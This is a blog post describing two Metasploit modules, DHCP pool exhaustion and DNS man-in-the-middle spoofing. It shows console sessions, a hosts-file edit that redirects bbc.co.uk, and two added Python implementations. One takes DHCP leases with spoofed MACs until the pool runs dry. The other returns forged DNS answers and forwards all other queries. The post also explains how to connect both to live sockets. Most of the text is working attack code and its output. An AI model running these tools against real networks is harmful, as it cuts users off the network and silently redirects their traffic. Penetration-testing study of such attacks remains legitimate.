DHCP Exhaustion and DNS MiTM
by Rootadmin on Mar.14, 2010, under Uncategorized
DigiNinja has created a Metasploit module for a DHCP exhaustion attack. The tool keeps requesting DHCP addresses until the server stops responding, which, as far as I can tell, means the IP pool is exhausted: there are no addresses left for DHCP to hand out, so a computer set to get its address from DHCP can't get on the network. A very nice idea for a denial of service attack, in my opinion.
He has also been working on a DNS man-in-the-middle module that has passed through various hands, the last being Wesley McGrew, who released his version but never got round to getting it into the Metasploit Framework. The module loads a list of domains to give fake responses for and returns real results for everything else. DigiNinja's work on this was to add the facility to reload the config file without a restart by doing a lookup on a preset domain. He also fixed a couple of minor bugs.
See http://www.digininja.org/metasploit/dns_dhcp_beta.php
Usage
You'll need to be root to run both modules, and for the DHCP module you'll need to put the interface into promiscuous mode before starting the attack so it can hear all the replies to the fake requests (the server answers to the spoofed client MAC addresses, not to your own). The easiest way to explain how to use them is to show the modules in use, so here they are...
DHCP Exhaustion
msf > use auxiliary/digininja/dhcp_exhaustion/exhaust
msf auxiliary(exhaust) > set
Global
======
No entries in data store.
Module: dhcp_exhaustion/exhaust
===============================
Name Value
---- -----
DHCPSERVER 255.255.255.255
SNAPLEN 65535
TIMEOUT 2
msf auxiliary(exhaust) > run
[*] DHCP attack started
[*] DHCP offer of address: 192.168.0.53
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.54
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.55
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.56
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.57
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.58
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.59
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.60
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.52
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.51
[*] Got the ACK back, IP address allocated successfully
[*] Timeout waiting for OFFER
[*] Got a timeout, assuming DHCP exhausted. You Win
[*] Finished
[*] Auxiliary module execution completed
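What the module is doing on the wire, as an added example that is not DigiNinja's code: a DHCP client that keeps inventing MAC addresses, walks each one through DISCOVER, OFFER, REQUEST and ACK, and stops the first time a DISCOVER gets no OFFER back. To keep it runnable offline it talks to an in-process fake server with a constructed pool (192.168.0.51 to 192.168.0.60 behind a server at 192.168.0.1 are made up here); the send function it takes is where a live run would plug in a UDP socket bound to port 68 with SO_BROADCAST and a two-second timeout. The builder sets the BOOTP BROADCAST flag, which RFC 2131 says should make the server broadcast its replies; not every server honours it, which is one reason to keep the interface in promiscuous mode as recommended above.

```python
# Added example, not DigiNinja's module: the DISCOVER/OFFER/REQUEST/ACK loop an
# exhaustion tool drives, run against an in-process fake server so it can be
# read and tested offline.  Server IP, pool and MAC prefix are constructed.
import os
import random
import socket
import struct

MAGIC = b"\x63\x82\x53\x63"                       # DHCP option cookie (RFC 2131)
DISCOVER, OFFER, REQUEST, ACK, NAK = 1, 2, 3, 5, 6


def random_mac():
    # Locally administered unicast MAC, so every lease looks like a new client.
    return b"\x02" + os.urandom(5)


def build_dhcp(msg_type, xid, mac, yiaddr="0.0.0.0", options=b""):
    """Fixed 236-byte BOOTP header + cookie + options (option 53 first, 255 last)."""
    op = 1 if msg_type in (DISCOVER, REQUEST) else 2        # BOOTREQUEST / BOOTREPLY
    fixed = struct.pack(
        "!BBBBIHH4s4s4s4s16s64s128s",
        op, 1, 6, 0, xid, 0, 0x8000,                         # flags: ask for broadcast replies
        bytes(4), socket.inet_aton(yiaddr), bytes(4), bytes(4),
        mac.ljust(16, b"\x00"), bytes(64), bytes(128))
    return fixed + MAGIC + bytes([53, 1, msg_type]) + options + b"\xff"


def parse_dhcp(pkt):
    """Return op, xid, yiaddr, chaddr and a {code: value} map of the options."""
    op, _, hlen, _, xid = struct.unpack("!BBBBI", pkt[:8])
    if pkt[236:240] != MAGIC:
        raise ValueError("not a DHCP packet")
    opts, i = {}, 240
    while i < len(pkt) and pkt[i] != 255:
        if pkt[i] == 0:                                      # pad byte
            i += 1
            continue
        code, length = pkt[i], pkt[i + 1]
        opts[code] = pkt[i + 2:i + 2 + length]
        i += 2 + length
    return {"op": op, "xid": xid, "yiaddr": socket.inet_ntoa(pkt[16:20]),
            "chaddr": pkt[28:28 + hlen], "options": opts}


class FakeDhcpServer:
    """Constructed target: a small pool, leases handed out first come first served."""

    def __init__(self, server_ip, pool):
        self.server_ip, self.free, self.leases = server_ip, list(pool), {}

    def handle(self, pkt):
        """Reply bytes, or None: a real server simply stays silent once the pool is empty."""
        req = parse_dhcp(pkt)
        sid = bytes([54, 4]) + socket.inet_aton(self.server_ip)   # server identifier
        mtype = req["options"][53][0]
        if mtype == DISCOVER and self.free:
            return build_dhcp(OFFER, req["xid"], req["chaddr"], self.free[0], sid)
        if mtype == REQUEST:
            wanted = socket.inet_ntoa(req["options"][50])
            if wanted not in self.free:
                return build_dhcp(NAK, req["xid"], req["chaddr"], options=sid)
            self.free.remove(wanted)
            self.leases[req["chaddr"]] = wanted
            return build_dhcp(ACK, req["xid"], req["chaddr"], wanted, sid)
        return None


def exhaust(send, max_rounds=1000):
    """Take leases with fresh MACs until an OFFER never comes back; return the IPs won.

    `send` transmits one packet and returns the reply, or None on timeout.  Live,
    it would be a UDP socket bound to 0.0.0.0:68 with SO_BROADCAST and a timeout.
    """
    taken = []
    for _ in range(max_rounds):
        mac, xid = random_mac(), random.getrandbits(32)
        offer = send(build_dhcp(DISCOVER, xid, mac))
        if offer is None:                       # "Timeout waiting for OFFER": pool exhausted
            break
        o = parse_dhcp(offer)
        if o["xid"] != xid or o["options"].get(53) != bytes([OFFER]) or 54 not in o["options"]:
            continue                            # stray or malformed reply, not ours
        want = bytes([50, 4]) + socket.inet_aton(o["yiaddr"]) + bytes([54, 4]) + o["options"][54]
        ack = send(build_dhcp(REQUEST, xid, mac, options=want))
        if ack is not None and parse_dhcp(ack)["options"].get(53) == bytes([ACK]):
            taken.append(o["yiaddr"])           # "Got the ACK back, IP address allocated"
    return taken


if __name__ == "__main__":
    srv = FakeDhcpServer("192.168.0.1", ["192.168.0.%d" % i for i in range(51, 61)])
    won = exhaust(srv.handle)
    print("took %d leases, pool left: %s" % (len(won), srv.free))
```

The stop condition is the same one the module prints: silence on a DISCOVER is taken as an empty pool. On a real network that silence can also mean the server rate-limits, that replies are being unicast to the spoofed MAC and not reaching you, or that a switch with DHCP snooping or port security is dropping the frames, so a timeout is evidence of exhaustion, not proof; checking from a second client that really cannot get a lease is the confirmation.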
DNS MiTM
msf > use auxiliary/digininja/dns_mitm/dns_mitm
msf auxiliary(dns_mitm) > set
Global
======
No entries in data store.
Module: dns_mitm/dns_mitm
=========================
Name Value
---- -----
RELOAD digininja.reload
SRVHOST 0.0.0.0
SRVPORT 53
msf auxiliary(dns_mitm) > run
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: FILENAME, REALDNS.
msf auxiliary(dns_mitm) > set FILENAME /usr/src/metasploit/modules/auxiliary/dns_mitm/dns.txt
FILENAME => /usr/src/metasploit/modules/auxiliary/dns_mitm/dns.txt
msf auxiliary(dns_mitm) > set REALDNS 192.168.0.8
REALDNS => 192.168.0.8
msf auxiliary(dns_mitm) > set
Global
======
No entries in data store.
Module: dns_mitm/dns_mitm
=========================
Name Value
---- -----
FILENAME /usr/src/metasploit/modules/auxiliary/dns_mitm/dns.txt
REALDNS 192.168.0.8
RELOAD digininja.reload
SRVHOST 0.0.0.0
SRVPORT 53
msf auxiliary(dns_mitm) > run
[*] Auxiliary module running as background job
msf auxiliary(dns_mitm) >
[*] Loading hosts file
The hosts file contains a single entry:
192.168.0.2 google.com
Now do some lookups, google.com and bbc.co.uk:
nslookup
> server localhost
Default server: localhost
Address: ::1#53
Default server: localhost
Address: 127.0.0.1#53
> google.com
Server: localhost
Address: 127.0.0.1#53
Non-authoritative answer:
Name: google.com
Address: 192.168.0.2
Name: google.com
Address: 192.168.0.2
Name: google.com
Address: 192.168.0.2
> bbc.co.uk
Server: localhost
Address: 127.0.0.1#53
Non-authoritative answer:
Name: bbc.co.uk
Address: 212.58.224.138
Google is middled but the BBC gets through. Now add the BBC to the hosts file:
echo "192.168.0.2 bbc.co.uk" >> dns.txt
Refresh the server by looking up the special domain, then check the BBC again:
> digininja.reload
Server: localhost
Address: 127.0.0.1#53
Non-authoritative answer:
*** Can't find digininja.reload: No answer
> bbc.co.uk
Server: localhost
Address: 127.0.0.1#53
Non-authoritative answer:
Name: bbc.co.uk
Address: 192.168.0.2
The BBC is now ours!
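The same decision logic in plain Python, added here as an illustration rather than taken from the module: a hosts-file table, a spoofed A record for any name in it, pass-through to the real resolver for everything else, and a reload triggered by resolving the RELOAD name. DNS packets are built and parsed by hand (A records only, no EDNS), the upstream resolver is a constructed stub that always answers with the BBC address from the walkthrough, and the hosts file is written to a temporary path; none of that is the module's own code. demo() replays the four lookups above and returns their results.

```python
# Added example, not DigiNinja's module: hosts-file DNS MiTM logic.  Listed names
# get a spoofed A record, anything else is forwarded untouched, and resolving the
# reload name re-reads the file.  Upstream here is a constructed stub.
import os
import socket
import struct
import tempfile


def encode_name(name):
    return b"".join(bytes([len(p)]) + p.encode() for p in name.strip(".").split(".")) + b"\x00"


def decode_name(pkt, off):
    """Read a (possibly compressed) name at `off`; return (name, offset after it)."""
    labels = []
    while True:
        n = pkt[off]
        if n == 0:
            return ".".join(labels), off + 1
        if n & 0xC0 == 0xC0:                                   # compression pointer
            ptr = struct.unpack("!H", pkt[off:off + 2])[0] & 0x3FFF
            labels.append(decode_name(pkt, ptr)[0])
            return ".".join(labels), off + 2
        labels.append(pkt[off + 1:off + 1 + n].decode())
        off += 1 + n


def build_query(name, qid, qtype=1):
    header = struct.pack("!HHHHHH", qid, 0x0100, 1, 0, 0, 0)  # RD set, one question
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)


def parse_query(pkt):
    qid = struct.unpack("!H", pkt[:2])[0]
    name, off = decode_name(pkt, 12)
    qtype = struct.unpack("!H", pkt[off:off + 2])[0]
    return {"id": qid, "name": name.lower(), "qtype": qtype, "question": pkt[12:off + 4]}


def build_answer(q, ip=None, ttl=60):
    """NOERROR reply; ip=None gives an empty answer section (nslookup says 'No answer')."""
    rr = b""
    if ip is not None:                                         # 0xc00c points at the question name
        rr = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, 4) + socket.inet_aton(ip)
    header = struct.pack("!HHHHHH", q["id"], 0x8180, 1, 1 if rr else 0, 0, 0)  # QR, RD, RA
    return header + q["question"] + rr


def a_records(pkt):
    """A-record addresses in a reply, so results can be checked without nslookup."""
    ancount = struct.unpack("!H", pkt[6:8])[0]
    off = decode_name(pkt, 12)[1] + 4                          # skip the question section
    ips = []
    for _ in range(ancount):
        off = decode_name(pkt, off)[1]
        rtype, _, _, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
        off += 10
        if rtype == 1:
            ips.append(socket.inet_ntoa(pkt[off:off + rdlen]))
        off += rdlen
    return ips


class DnsMitm:
    def __init__(self, hosts_path, forward, reload_name="digininja.reload"):
        self.hosts_path, self.forward, self.reload_name = hosts_path, forward, reload_name
        self.load_hosts()

    def load_hosts(self):
        """hosts(5) layout: '<ip> <name> [name ...]', '#' starts a comment."""
        self.hosts = {}
        with open(self.hosts_path) as f:
            for line in f:
                fields = line.split("#", 1)[0].split()
                for name in fields[1:]:
                    self.hosts[name.lower()] = fields[0]

    def handle(self, pkt):
        q = parse_query(pkt)
        if q["name"] == self.reload_name:
            self.load_hosts()
            return build_answer(q)                             # empty reply, as in the nslookup output
        if q["qtype"] == 1 and q["name"] in self.hosts:
            return build_answer(q, self.hosts[q["name"]])      # spoofed answer
        return self.forward(pkt)                               # real answer via REALDNS


def fake_upstream(pkt):
    """Constructed stand-in for REALDNS; live code would sendto() <REALDNS>:53 over UDP."""
    return build_answer(parse_query(pkt), "212.58.224.138")    # BBC address from the walkthrough


def demo():
    """Replay the walkthrough: spoof google.com, let bbc.co.uk through, reload, spoof it too."""
    fd, path = tempfile.mkstemp(suffix=".txt")
    with os.fdopen(fd, "w") as f:
        f.write("192.168.0.2 google.com\n")
    mitm = DnsMitm(path, fake_upstream)
    google = a_records(mitm.handle(build_query("google.com", 1)))
    bbc_before = a_records(mitm.handle(build_query("bbc.co.uk", 2)))
    with open(path, "a") as f:
        f.write("192.168.0.2 bbc.co.uk\n")                     # the echo >> dns.txt step
    reload_reply = a_records(mitm.handle(build_query("digininja.reload", 3)))
    bbc_after = a_records(mitm.handle(build_query("bbc.co.uk", 4)))
    os.unlink(path)
    return google, bbc_before, reload_reply, bbc_after
```

To serve real clients you would bind a UDP socket on port 53 (root, as noted above), pass each datagram to handle() and send the return value back, with forward being a function that relays the query bytes to REALDNS and returns whatever comes back. Two things worth knowing before relying on this on an engagement: only A queries are spoofed, so a dual-stack client that asks for AAAA first will get the real address from upstream, and the reload name answers with an empty reply rather than NXDOMAIN, which is exactly the "No answer" nslookup prints above.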